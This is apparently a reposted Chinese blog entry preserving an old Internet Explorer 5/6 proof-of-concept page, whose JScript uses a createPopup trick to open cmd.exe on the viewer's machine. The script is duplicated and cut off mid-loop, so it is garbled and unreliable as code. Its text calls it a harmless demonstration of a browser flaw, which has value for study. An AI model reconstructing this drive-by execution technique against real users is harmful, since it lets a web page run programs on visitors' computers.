忘了是哪个网站上抄下来的了,javascript运行客户端exe程序
作者:袖梨
2022-06-30
PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
IE6 security...
T language=JScript>
var programName=new Array(
'c:/windows/system32/cmd.exe',
'c:/winnt/system32/cmd.exe',
'c:/cmd.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}
var programName=new Array(
'c:/windows/system32/cmd.exe',
'c:/winnt/system32/cmd.exe',
'c:/cmd.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}
Hmm, let's start a command shell...
This page doesn't do anything malicious, but is a demonstration of how to execute a program on a remote machine using the
marvelously secure Internet Explorer web browser!!
Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There
are currently no patches available using "Windows Update" which will prevent this.
